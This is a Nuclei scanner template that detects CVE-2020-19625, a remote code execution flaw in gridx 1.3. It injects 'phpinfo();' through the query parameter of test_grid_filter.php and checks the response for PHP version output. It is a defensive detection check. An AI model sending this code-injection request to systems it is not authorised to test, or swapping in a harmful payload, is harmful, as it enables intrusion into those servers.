nuclei-templates/cves/2020/CVE-2020-19625.yaml

31 lines
845 B
YAML
Raw Normal View History

2021-05-26 11:09:57 +00:00
id: CVE-2020-19625
2021-04-15 13:16:11 +00:00
info:
name: Gridx 1.3 RCE
author: geeknik
description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter.
reference: https://github.com/oria/gridx/issues/433
severity: high
tags: cve,cve2020,gridx,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
2021-05-15 13:55:57 +00:00
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'